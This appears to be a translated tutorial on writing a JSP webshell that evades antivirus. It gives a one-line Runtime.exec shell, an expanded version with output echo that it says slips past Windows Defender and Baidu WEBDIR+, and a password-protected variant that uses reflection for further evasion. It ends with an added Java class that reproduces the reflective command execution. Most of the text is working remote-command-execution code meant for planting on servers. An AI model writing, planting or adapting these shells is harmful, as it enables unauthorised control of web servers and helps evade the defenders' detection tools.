Start with a one-liner
First, approach it from the one-liner angle. Here is the JSP one-liner webshell:
This webshell is killed outright by Windows Defender, and Baidu WEBDIR+ flags it as well.
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
Now split the one-liner up, add command-output echo and fix the garbled output, and we get the following code:
<%@ page language="java" pageEncoding="UTF-8" %>
<%
Runtime rt = Runtime.getRuntime();
String cmd = request.getParameter("cmd");
Process process = rt.exec(cmd);
java.io.InputStream in = process.getInputStream();
// Echo the command output back to the client
out.print("<pre>");
// The echo code circulating online is slightly buggy; this form is recommended instead
java.io.InputStreamReader resultReader = new java.io.InputStreamReader(in);
java.io.BufferedReader stdInput = new java.io.BufferedReader(resultReader);
String s = null;
while ((s = stdInput.readLine()) != null) {
    out.println(s);
}
out.print("</pre>");
%>
This gets past Windows Defender and Baidu WEBDIR+.
However, we shouldn't settle for that, because these engines are not particularly aggressive in what they flag.
On top of this, we can add reflective invocation to take the evasion one step further. Note that the password check compares with PASSWORD.equals(passwd) rather than passwd.equals(PASSWORD), so a request without a pwd parameter is rejected instead of throwing a NullPointerException and leaking a stack trace into the response:
<%@ page language="java" pageEncoding="UTF-8" %>
<%
// Add a password
String PASSWORD = "password";
String passwd = request.getParameter("pwd");
String cmd = request.getParameter("cmd");
if (!PASSWORD.equals(passwd)) {
    return;
}
// Reflective invocation: Runtime.getRuntime().exec(cmd) without writing the call literally
Class rt = Class.forName("java.lang.Runtime");
java.lang.reflect.Method gr = rt.getMethod("getRuntime");
java.lang.reflect.Method ex = rt.getMethod("exec", String.class);
Process process = (Process) ex.invoke(gr.invoke(null), cmd);
// Echo the output, same as above
java.io.InputStream in = process.getInputStream();
out.print("<pre>");
java.io.InputStreamReader resultReader = new java.io.InputStreamReader(in);
java.io.BufferedReader stdInput = new java.io.BufferedReader(resultReader);
String s = null;
while ((s = stdInput.readLine()) != null) {
    out.println(s);
}
out.print("</pre>");
%>
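As an added, stand-alone illustration (not code from the original post), here is the reflective variant rewritten as a plain Java class so it can be compiled and run outside a servlet container. The class name, method names and the charset selection are my own assumptions. It also covers two things the JSP above skips: stderr is drained on its own thread, so a child process that writes a lot of errors cannot block on a full pipe, and the password comparison is null-safe, so a missing password yields false instead of a NullPointerException.

```java
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.lang.reflect.Method;
import java.nio.charset.Charset;
import java.nio.charset.StandardCharsets;

// Added example: the reflective exec from the JSP above as a plain Java class.
// Class/method names and the charset selection are illustrative assumptions.
public class ReflectiveExec {

    // Plays the role of PASSWORD in the JSP; the value is a placeholder.
    private static final String PASSWORD = "password";

    // Null-safe check: PASSWORD.equals(null) is false, null.equals(...) would throw.
    static boolean authorized(String supplied) {
        return PASSWORD.equals(supplied);
    }

    // Runtime.getRuntime().exec(String) reached only through reflection,
    // the same call chain the JSP builds with Class.forName/getMethod/invoke.
    static Process execViaReflection(String cmd) throws ReflectiveOperationException {
        Class<?> rt = Class.forName("java.lang.Runtime");
        Method getRuntime = rt.getMethod("getRuntime");
        Method exec = rt.getMethod("exec", String.class);
        Object runtime = getRuntime.invoke(null);   // static method: no receiver
        return (Process) exec.invoke(runtime, cmd);
    }

    // Read a stream to the end with an explicit charset. Console output on a
    // Chinese Windows host is GBK (code page 936); decoding it as UTF-8 is
    // what produces the garbled echo the post mentions.
    static String drain(InputStream in, Charset cs) throws IOException {
        StringBuilder sb = new StringBuilder();
        try (BufferedReader r = new BufferedReader(new InputStreamReader(in, cs))) {
            String line;
            while ((line = r.readLine()) != null) {
                sb.append(line).append('\n');
            }
        }
        return sb.toString();
    }

    // Run cmd and return stdout, then stderr, then the exit code.
    static String run(String cmd, Charset cs) throws Exception {
        Process p = execViaReflection(cmd);
        StringBuilder err = new StringBuilder();
        // stderr is drained concurrently; reading stdout to EOF first would
        // deadlock if the child fills its stderr pipe before finishing.
        Thread errReader = new Thread(() -> {
            try {
                err.append(drain(p.getErrorStream(), cs));
            } catch (IOException e) {
                err.append("[stderr read failed: ").append(e).append("]\n");
            }
        });
        errReader.start();
        String out = drain(p.getInputStream(), cs);
        errReader.join();
        int code = p.waitFor();
        return out + err + "[exit " + code + "]\n";
    }

    public static void main(String[] args) throws Exception {
        String pwd = args.length > 0 ? args[0] : null;
        if (!authorized(pwd)) {
            System.out.println("wrong or missing password");
            return;
        }
        boolean windows = System.getProperty("os.name").toLowerCase().startsWith("windows");
        // Assumption: GBK console on Windows, UTF-8 elsewhere; adjust to the target host.
        Charset cs = windows ? Charset.forName("GBK") : StandardCharsets.UTF_8;
        String cmd = args.length > 1 ? args[1] : (windows ? "cmd /c dir" : "ls -la");
        System.out.print(run(cmd, cs));
    }
}
```

Compile with javac ReflectiveExec.java and run as java ReflectiveExec password "whoami". Bear in mind that Runtime.exec(String) splits the command on whitespace with StringTokenizer, so shell features such as pipes and quoting only work when the command is wrapped in cmd /c or sh -c, which is also why the JSP variants above behave differently depending on what is passed in cmd.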
